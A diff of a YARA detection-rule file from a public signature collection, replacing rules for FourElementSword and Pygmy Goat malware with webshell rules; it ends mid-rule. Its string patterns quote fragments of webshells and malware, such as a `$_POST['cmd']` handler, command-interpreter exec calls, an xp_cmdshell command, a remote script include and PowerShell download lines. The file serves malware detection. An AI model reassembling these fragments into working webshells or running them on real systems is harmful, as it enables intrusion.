-		logic_hash = "c4c562124427fd394b56e48f16f2d262c8a717fc750b955b2b2a35acb478d5e7"
+		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
+		logic_hash = "b86fa40fd7bbcae86926182882faa226530e44c20bc611b8433a7da7f012106c"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$import_names = { C7 45 D0 75 73 65 72 C7 45 D4 33 32 2E 64 66 C7 45 D8 6C 6C 88 5D DA C7 45 84 61 64 76 61 C7 45 88 70 69 33 32 C7 45 8C 2E 64 6C 6C 88 5D 90 C7 45 B8 77 69 6E 69 C7 45 BC 6E 65 74 2E C7 45 C0 64 6C 6C 00 C7 45 C4 77 73 32 5F C7 45 C8 33 32 2E 64 66 C7 45 CC 6C 6C 88 5D CE C7 45 94 73 68 65 6C C7 45 98 6C 33 32 2E C7 45 9C 64 6C 6C 00 C7 45 E8 70 73 61 70 C7 45 EC 69 2E 64 6C 66 C7 45 F0 6C 00 C7 85 74 FF FF FF 6E 65 74 61 C7 85 78 FF FF FF 70 69 33 32 C7 85 7C FF FF FF 2E 64 6C 6C 88 5D 80 C7 85 64 FF FF FF 6F 6C 65 61 C7 85 68 FF FF FF 75 74 33 32 C7 85 6C FF FF FF 2E 64 6C 6C 88 9D 70 FF FF FF C7 45 DC 6F 6C 65 33 C7 45 E0 32 2E 64 6C 66 C7 45 E4 6C 00 C7 45 A0 76 65 72 73 C7 45 A4 69 6F 6E 2E C7 45 A8 64 6C 6C 00 C7 85 54 FF FF FF 69 6D 61 67 C7 85 58 FF FF FF 65 68 6C 70 C7 85 5C FF FF FF 2E 64 6C 6C 88 9D 60 FF FF FF C7 45 AC 61 70 70 68 C7 45 B0 65 6C 70 2E C7 45 B4 64 6C 6C 00 C7 45 F4 2E 64 6C 6C 88 5D F8 }
+		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
+		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_Config_File
+rule SIGNATURE_BASE_BIN_Server
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Webshells Auto-generated - file Server.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "488a2344-3d8d-5769-aca8-9e14f38f5eb0"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L11-L28"
+		id = "1625b0ee-5f9f-57d8-8333-f175f46d6c59"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8974-L8990"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f05cd0353817bf6c2cab396181464c31c352d6dea07e2d688def261dd6542b27"
-		logic_hash = "680e50998093e63a4e3c7d5338ac149efef83cdb41ceb4ce0245e8bd2ab99b84"
+		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
+		logic_hash = "34f9d78e0f61717fae2945e7a833c2c6d59e28035ee95da2c5d32b4e196bc957"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "01,,hccutils.dll,2" fullword ascii
-		$s1 = "RegisterDlls=OurDll" fullword ascii
-		$s2 = "[OurDll]" fullword ascii
-		$s3 = "[DefaultInstall]" fullword ascii
-		$s4 = "Signature=\"$Windows NT$\"" fullword ascii
+		$s0 = "configserver"
+		$s1 = "GetLogicalDrives"
+		$s2 = "WinExec"
+		$s4 = "fxftest"
+		$s5 = "upfileok"
+		$s7 = "upfileer"
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_T9000 : FILE
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Webshells Auto-generated - file 2006.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "35ae844e-52e1-5e6f-984d-aa75ebd2f60f"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L30-L49"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8991-L9002"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
-		logic_hash = "1c7b063cbe9d44a9d194a180570f8313460f61560ac2cda5d66e048934170faa"
+		hash = "c19d6f4e069188f19b08fa94d44bc283"
+		logic_hash = "536232bbdd21bddb88eefe06a82927abcdd3ed10404c052957896960a6d10932"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "D:\\WORK\\T9000\\" ascii
-		$x2 = "%s\\temp\\HHHH.dat" fullword wide
-		$s1 = "Elevate.dll" fullword wide
-		$s2 = "ResN32.dll" fullword wide
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword wide
-		$s4 = "igfxtray.exe" fullword wide
+		$s6 = "strBackDoor = strBackDoor "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_32DLL : FILE
+rule SIGNATURE_BASE_R57Shell_3
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Webshells Auto-generated - file r57shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc801364-9f40-50eb-90e1-99f8605014c7"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L51-L68"
+		id = "4129d77c-2981-587b-a83e-8767dc3a48d8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9003-L9014"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7a200c4df99887991c638fe625d07a4a3fc2bdc887112437752b3df5c8da79b6"
-		logic_hash = "b44870975f126b8603db04b97b748f7a5a75675ffe57037f613c11d6048200b1"
+		hash = "87995a49f275b6b75abe2521e03ac2c0"
+		logic_hash = "0fdca080c7ce57b7bd818a968840aebf3c5c74f188ed062fec794bfadb4e75b0"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "%temp%\\tmp092.tmp" fullword ascii
-		$s1 = "\\System32\\ctfmon.exe" ascii
-		$s2 = "%SystemRoot%\\System32\\" ascii
-		$s3 = "32.dll" fullword ascii
+		$s1 = "<b>\".$_POST['cmd']"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 660KB and $x1 ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_Keyainst_EXE : FILE
+rule SIGNATURE_BASE_Hdconfig
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Webshells Auto-generated - file HDConfig.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "175fe2b0-3c76-5464-9a1a-218a09b25a5a"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L70-L87"
+		id = "6f743137-e85a-5298-b51e-c8792e507d28"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9015-L9030"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cf717a646a015ee72f965488f8df2dd3c36c4714ccc755c295645fe8d150d082"
-		logic_hash = "1491de3241a81cce4d80d6dc23886f1d8bf316112c48652a8138aa4cbadbb174"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "7d60e552fdca57642fd30462416347bd"
+		logic_hash = "9001f79db15548cf3ca931d0043d078db7d900ab26093afbf5cd44d0a85800f4"
+		score = 60
+		quality = 55
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "C:\\ProgramData\\Keyainst.exe" fullword ascii
-		$s1 = "ShellExecuteA" fullword ascii
-		$s2 = "GetStartupInfoA" fullword ascii
-		$s3 = "SHELL32.dll" fullword ascii
+		$s0 = "An encryption key is derived from the password hash. "
+		$s3 = "A hash object has been created. "
+		$s4 = "Error during CryptCreateHash!"
+		$s5 = "A new key container has been created."
+		$s6 = "The password has been added to the hash. "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 48KB and $x1 ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_Elevatedll_2 : FILE
+rule SIGNATURE_BASE_FSO_S_Ajan_2
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Webshells Auto-generated - file ajan.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06879d75-18a3-5d49-a963-fa4bee379387"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L89-L104"
+		id = "a66c34ed-0ae2-5e04-bfc4-c82583c5e066"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9031-L9043"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9c23febc49c7b17387767844356d38d5578727ee1150956164883cf555fe7f95"
-		logic_hash = "d5fcb2bacfa0a1f78bfbd3fa7ba3084da9a60f1b8b7880c83d8f225312c179b4"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+		logic_hash = "0ac31ee735c94289932369dfba5b408cbf71cc23fd48ce3e09dc7ce640a0d733"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Elevate.dll" fullword ascii
-		$s2 = "GetSomeF" fullword ascii
-		$s3 = "GetNativeSystemInfo" fullword ascii
+		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
+		$s3 = "/file.zip"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 25KB and $s1 ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_Fslapi_Dll_Gui : FILE
+rule SIGNATURE_BASE_Webshell_And_Exploit_CN_APT_HK : WEBSHELL
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1cc73eaf-7463-5070-97e5-6ea4c7735371"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L106-L121"
+		id = "eb37a22b-4e8a-5986-bd47-4ef5b4986f47"
+		date = "2014-10-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9045-L9060"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2a6ef9dde178c4afe32fe676ff864162f104d85fac2439986de32366625dc083"
-		logic_hash = "909b187f864a240268d0ffcef904b85cd1eaad97dd3a3a808aad58968fbb76c2"
-		score = 75
+		logic_hash = "ec3f1e985585e1bf77a46e971a20cd127064a64467761a5a570548dd63ec57e2"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = "WEBSHELL"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "fslapi.dll.gui" fullword wide
-		$s2 = "ImmGetDefaultIMEWnd" fullword ascii
-		$s3 = "RichOX" fullword ascii
+		$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+		$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
+		$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 12KB and all of them )
+		$a0 or ( all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Fourelementsword_Powershell_Start
+rule SIGNATURE_BASE_JSP_Browser_APT_Webshell
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62affc03-a408-5d8f-99da-58dead8646c5"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L123-L137"
+		id = "06988b5b-ec8b-5a10-b659-3e846057ea51"
+		date = "2014-10-10"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9062-L9076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9b6053e784c5762fdb9931f9064ba6e52c26c2d4b09efd6ff13ca87bbb33c692"
-		logic_hash = "7b1986845d97dcd11c8baddb0b49350ad30c6fff98840275befef4ad0b906b54"
-		score = 75
+		logic_hash = "a352bf394f1b4f70218650758db39225a5a505656299405ccd077592d29480a7"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "start /min powershell C:\\\\ProgramData\\\\wget.exe" ascii
-		$s1 = "start /min powershell C:\\\\ProgramData\\\\iuso.exe" fullword ascii
+		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_Resn32Dll
+rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e1f6d8d-53ea-542f-ba49-39b4c86f3124"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L139-L154"
+		id = "b5080e43-44e2-54fa-b03a-057dc75d14db"
+		date = "2014-12-10"
+		modified = "2025-11-03"
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9078-L9091"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f"
-		logic_hash = "9658ae3d1267993551cfb939f75f3d78de18cbeb2f524c2576b849103f3cacdc"
-		score = 75
+		logic_hash = "7efaca469d09ce7ecba4ed38cb0b07d1b9fc4f45172d2ffb6f5d3259c000fdc5"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Release\\BypassUAC.pdb" ascii
-		$s2 = "\\ResN32.dll" wide
-		$s3 = "Eupdate" fullword wide
+		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Fourelementsword_Elevatedll : FILE
+rule SIGNATURE_BASE_JSP_Jfigueiredo_APT_Webshell_2
 {
 	meta:
-		description = "Detects FourElementSword Malware"
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06879d75-18a3-5d49-a963-fa4bee379387"
-		date = "2016-04-18"
-		modified = "2023-12-05"
-		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_four_element_sword.yar#L158-L179"
+		id = "91575627-78c1-5ca1-8180-cc4004df88e8"
+		date = "2014-12-10"
+		modified = "2025-11-03"
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9093-L9108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d110bae02f00d14c5a71ecf5991e9fc38b29d8056d1e551dc36376875d2e1333"
-		score = 75
+		logic_hash = "f7fa5872d8eb4ba1d0b26d966d7650d70b1a10c56945d5a5340b8e1cb5d0f5f0"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9"
-		hash2 = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
+		tags = ""
 
 	strings:
-		$x1 = "Elevate.dll" fullword wide
-		$x2 = "ResN32.dll" fullword wide
-		$s1 = "Kingsoft\\Antivirus" fullword wide
-		$s2 = "KasperskyLab\\protected" fullword wide
-		$s3 = "Sophos" fullword wide
+		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) and all of ( $s* ) ) or ( all of them )
+		all of ( $a* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_Trojan_Win32_Adupib_1 : PLATINUM
+rule SIGNATURE_BASE_Webshell_Insomnia
 {
 	meta:
-		description = "Adupib SSL Backdoor"
-		author = "Microsoft"
-		id = "fb3b10a4-66d7-50ec-b6a5-b3c5c382ef01"
-		date = "2016-04-12"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ms_platinum.yara#L101-L122"
+		description = "Insomnia Webshell - file InsomniaShell.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62ed3695-9ab8-54d4-a9d2-b6270c56ccfb"
+		date = "2014-12-09"
+		modified = "2025-11-03"
+		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9110-L9131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd"
-		logic_hash = "4d93b6a041468b51763d9497acf3d01ee59ac05f1807a6b140c557ef96d26df9"
-		score = 75
+		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
+		logic_hash = "d170c60f94092a38ba4af92283debd059eef2e4c683fd7737ffd60d1a2581d9c"
+		score = 80
 		quality = 85
-		tags = "PLATINUM"
-		unpacked_sample_sha1 = "a80051d5ae124fd9e5cc03e699dd91c2b373978b"
-		activity_group = "Platinum"
-		version = "1.0"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$str1 = "POLL_RATE"
-		$str2 = "OP_TIME(end hour)"
-		$str3 = "%d:TCP:*:Enabled"
-		$str4 = "%s[PwFF_cfg%d]"
-		$str5 = "Fake_GetDlgItemTextW: ***value***="
+		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
 
 	condition:
-		$str1 and $str2 and $str3 and $str4 and $str5
+		3 of them
 }
-rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_AES_Key : FILE
+rule SIGNATURE_BASE_Hawkeye_PHP_Panel : FILE
 {
 	meta:
-		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the Pygmy Goat AES key built on the stack or in data"
-		author = "NCSC"
-		id = "62be3f4f-b435-54b2-b596-4ad01606edb8"
-		date = "2024-10-22"
-		modified = "2024-12-12"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_sophos_pygmy_nov24.yar#L2-L24"
+		description = "Detects HawkEye Keyloggers PHP Panel"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1d185345-6684-538f-954a-45d57a618a7a"
+		date = "2014-12-14"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9133-L9148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da6c5d7a03eab01ddbb460cbdd16622839b3a52cfa4e91f169d3d477c60cfed4"
-		score = 75
-		quality = 69
+		logic_hash = "e29b6df4e3aa3892b10e68218320ac76cecb5a1bbe6c48f2276014b972cbbdd8"
+		score = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dword_1 = { 59 4b 6e 77 }
-		$dword_2 = { 51 6a 6d 41 }
-		$dword_3 = { 54 62 41 6e }
-		$dword_4 = { 52 6f 5a 6d }
-		$dword_5 = { 30 66 47 37 }
-		$dword_6 = { 55 5a 57 62 }
-		$dword_7 = { 32 59 55 78 }
-		$dword_8 = { 55 51 50 77 }
+		$s0 = "$fname = $_GET['fname'];" ascii fullword
+		$s1 = "$data = $_GET['data'];" ascii fullword
+		$s2 = "unlink($fname);" ascii fullword
+		$s3 = "echo \"Success\";" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them and filesize < 4MB
+		all of ( $s* ) and filesize < 600
 }
-rule SIGNATURE_BASE_MAL_Sophos_XG_Pygmy_Goat_Magic_Strings : FILE
+rule SIGNATURE_BASE_Soaksoak_Infected_Wordpress
 {
 	meta:
-		description = "Detects Pygmy Goat - a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This detection rule is based on the magic byte sequences used in C2 communications."
-		author = "NCSC"
-		id = "7df6c228-d569-5f1c-8bbb-4194347f99d1"
-		date = "2024-10-22"
-		modified = "2024-12-12"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_sophos_pygmy_nov24.yar#L26-L44"
+		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d147af65-72de-50be-9435-bef47eb4842a"
+		date = "2014-12-15"
+		modified = "2025-11-03"
+		reference = "http://goo.gl/1GzWUX"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9150-L9165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df40e818002a72ee649dd2bb79cb59938dc108690cce03c99a72fc036406c4b2"
-		score = 75
+		logic_hash = "4cba18a0d14be2795d71a1973265a1742beda57636f64c1974001ecf70e3e91d"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "71f70d61af00542b2e9ad64abd2dda7e437536ff"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$c2_magic_handshake = ",bEB3?=o"
-		$fake_ssh_banner = "SSH-2.0-D8pjE"
-		$fake_ed25519_key = { 29 cc f0 cc 16 c5 46 6e 52 19 82 8e 86
-      65 42 8c 1f 1a d4 c3 a5 b1 cb fc c0 26 6c 31 3c 5c 90 3a 24 7d e4 d3 57
-      6d da 8e cb f4 66 d1 cb 81 4f 63 fd 4a fa 06 e4 7e 4c a0 95 91 bd cb 97
-      a4 b3 0f }
+		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+		$s1 = "function FuncQueueObject()" ascii fullword
+		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
 
 	condition:
-		uint32( 0 ) == 0x464c457f and any of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_Earthworm_Socks_Proxy_ID_Generation : FILE
+rule SIGNATURE_BASE_Pastebin_Webshell
 {
 	meta:
-		description = "Detects EarthWorm - a reverse socks proxy used by the threat group that deployed Pygmy Goat malware on Sophos XG firewall devices. The detection is based on the pool num generation x86 assembly."
-		author = "NCSC"
-		id = "242777e4-3abb-50d8-8c45-746cc4a8b1f8"
-		date = "2024-10-22"
-		modified = "2024-12-12"
-		reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_sophos_pygmy_nov24.yar#L46-L71"
+		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+		author = "Florian Roth (Nextron Systems)"
